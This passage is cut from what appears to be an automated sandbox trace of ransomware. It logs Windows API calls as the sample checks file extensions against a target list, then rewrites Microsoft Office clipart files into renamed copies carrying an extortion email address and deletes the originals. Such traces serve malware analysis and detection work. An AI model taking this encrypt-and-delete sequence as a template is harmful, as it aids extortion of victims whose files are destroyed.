(lpString1=".bz2", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString=".7z") returned 3 [0068.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString=".dbf") returned 4 [0068.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString=".1cd") returned 4 [0068.277] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString=".jpg") returned 4 [0068.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.278] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.278] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.278] GetLastError () returned 0x0 [0068.278] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa38, lpOverlapped=0x0) returned 1 [0068.291] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa40, lpOverlapped=0x0) returned 1 [0068.292] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.292] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.292] SetEndOfFile (hFile=0x3a0) returned 1 [0068.292] CloseHandle (hObject=0x3a0) returned 1 [0068.292] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.292] SetEndOfFile (hFile=0x384) returned 1 [0068.293] CloseHandle (hObject=0x384) returned 1 [0068.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.293] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf")) returned 1 [0068.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.294] lstrlenW (lpString=".doc") returned 4 [0068.294] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.294] lstrlenW (lpString=".docx") returned 5 [0068.294] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.294] lstrlenW (lpString=".pdf") returned 4 [0068.294] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.294] lstrlenW (lpString=".xls") returned 4 [0068.294] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.294] lstrlenW (lpString=".xlsx") returned 5 [0068.294] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.294] lstrlenW (lpString=".ppt") returned 4 [0068.294] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.294] lstrlenW (lpString=".zip") returned 4 [0068.294] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.294] lstrlenW (lpString=".rar") returned 4 [0068.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.297] lstrlenW (lpString=".bz2") returned 4 [0068.297] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.297] lstrlenW (lpString=".7z") returned 3 [0068.297] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.297] lstrlenW (lpString=".dbf") returned 4 [0068.297] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.297] lstrlenW (lpString=".1cd") returned 4 [0068.297] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 68 [0068.297] lstrlenW (lpString=".jpg") returned 4 [0068.297] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.297] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.297] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.298] GetLastError () returned 0x0 [0068.298] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x6852, lpOverlapped=0x0) returned 1 [0068.307] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x6860, lpOverlapped=0x0) returned 1 [0069.034] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.034] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.034] SetEndOfFile (hFile=0x3a0) returned 1 [0069.035] CloseHandle (hObject=0x3a0) returned 1 [0069.035] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.035] SetEndOfFile (hFile=0x384) returned 1 [0069.035] CloseHandle (hObject=0x384) returned 1 [0069.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf")) returned 1 [0069.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.036] lstrlenW (lpString=".doc") returned 4 [0069.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.036] lstrlenW (lpString=".docx") returned 5 [0069.036] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0069.036] lstrlenW (lpString=".pdf") returned 4 [0069.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.036] lstrlenW (lpString=".xls") returned 4 [0069.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.036] lstrlenW (lpString=".xlsx") returned 5 [0069.036] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0069.036] lstrlenW (lpString=".ppt") returned 4 [0069.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.036] lstrlenW (lpString=".zip") returned 4 [0069.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.037] lstrlenW (lpString=".rar") returned 4 [0069.037] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.037] lstrlenW (lpString=".bz2") returned 4 [0069.037] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.037] lstrlenW (lpString=".7z") returned 3 [0069.037] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.037] lstrlenW (lpString=".dbf") returned 4 [0069.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.037] lstrlenW (lpString=".1cd") returned 4 [0069.037] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 68 [0069.037] lstrlenW (lpString=".jpg") returned 4 [0069.037] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.037] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.037] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.038] GetLastError () returned 0x0 [0069.038] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xb80, lpOverlapped=0x0) returned 1 [0069.048] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xb90, lpOverlapped=0x0) returned 1 [0069.049] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.049] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.049] SetEndOfFile (hFile=0x3a0) returned 1 [0069.049] CloseHandle (hObject=0x3a0) returned 1 [0069.049] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.049] SetEndOfFile (hFile=0x384) returned 1 [0069.050] CloseHandle (hObject=0x384) returned 1 [0069.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf")) returned 1 [0069.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.051] lstrlenW (lpString=".doc") returned 4 [0069.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.051] lstrlenW (lpString=".docx") returned 5 [0069.051] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0069.051] lstrlenW (lpString=".pdf") returned 4 [0069.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.051] lstrlenW (lpString=".xls") returned 4 [0069.051] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.051] lstrlenW (lpString=".xlsx") returned 5 [0069.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0069.051] lstrlenW (lpString=".ppt") returned 4 [0069.051] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.051] lstrlenW (lpString=".zip") returned 4 [0069.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.051] lstrlenW (lpString=".rar") returned 4 [0069.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.051] lstrlenW (lpString=".bz2") returned 4 [0069.051] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.051] lstrlenW (lpString=".7z") returned 3 [0069.051] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.051] lstrlenW (lpString=".dbf") returned 4 [0069.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.052] lstrlenW (lpString=".1cd") returned 4 [0069.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 68 [0069.052] lstrlenW (lpString=".jpg") returned 4 [0069.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.052] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.052] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.053] GetLastError () returned 0x0 [0069.053] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x257c, lpOverlapped=0x0) returned 1 [0069.065] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2580, lpOverlapped=0x0) returned 1 [0069.066] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.066] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.066] SetEndOfFile (hFile=0x3a0) returned 1 [0069.067] CloseHandle (hObject=0x3a0) returned 1 [0069.067] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.067] SetEndOfFile (hFile=0x384) returned 1 [0069.067] CloseHandle (hObject=0x384) returned 1 [0069.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf")) returned 1 [0069.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.068] lstrlenW (lpString=".doc") returned 4 [0069.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.068] lstrlenW (lpString=".docx") returned 5 [0069.068] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0069.068] lstrlenW (lpString=".pdf") returned 4 [0069.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.068] lstrlenW (lpString=".xls") returned 4 [0069.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.068] lstrlenW (lpString=".xlsx") returned 5 [0069.068] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0069.068] lstrlenW (lpString=".ppt") returned 4 [0069.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.068] lstrlenW (lpString=".zip") returned 4 [0069.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.068] lstrlenW (lpString=".rar") returned 4 [0069.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.069] lstrlenW (lpString=".bz2") returned 4 [0069.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.069] lstrlenW (lpString=".7z") returned 3 [0069.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.069] lstrlenW (lpString=".dbf") returned 4 [0069.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.069] lstrlenW (lpString=".1cd") returned 4 [0069.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 68 [0069.069] lstrlenW (lpString=".jpg") returned 4 [0069.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.069] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.069] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.070] GetLastError () returned 0x0 [0069.070] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x8a12, lpOverlapped=0x0) returned 1 [0069.116] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x8a20, lpOverlapped=0x0) returned 1 [0069.117] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.117] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.117] SetEndOfFile (hFile=0x3a0) returned 1 [0069.118] CloseHandle (hObject=0x3a0) returned 1 [0069.118] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.118] SetEndOfFile (hFile=0x384) returned 1 [0069.119] CloseHandle (hObject=0x384) returned 1 [0069.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf")) returned 1 [0069.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.119] lstrlenW (lpString=".doc") returned 4 [0069.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.119] lstrlenW (lpString=".docx") returned 5 [0069.119] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0069.119] lstrlenW (lpString=".pdf") returned 4 [0069.119] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString=".xls") returned 4 [0069.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.120] lstrlenW (lpString=".xlsx") returned 5 [0069.120] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0069.120] lstrlenW (lpString=".ppt") returned 4 [0069.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.120] lstrlenW (lpString=".zip") returned 4 [0069.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.120] lstrlenW (lpString=".rar") returned 4 [0069.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString=".bz2") returned 4 [0069.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString=".7z") returned 3 [0069.120] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.120] lstrlenW (lpString=".dbf") returned 4 [0069.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.120] lstrlenW (lpString=".1cd") returned 4 [0069.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 68 [0069.120] lstrlenW (lpString=".jpg") returned 4 [0069.120] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.120] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.120] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.121] GetLastError () returned 0x0 [0069.121] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, 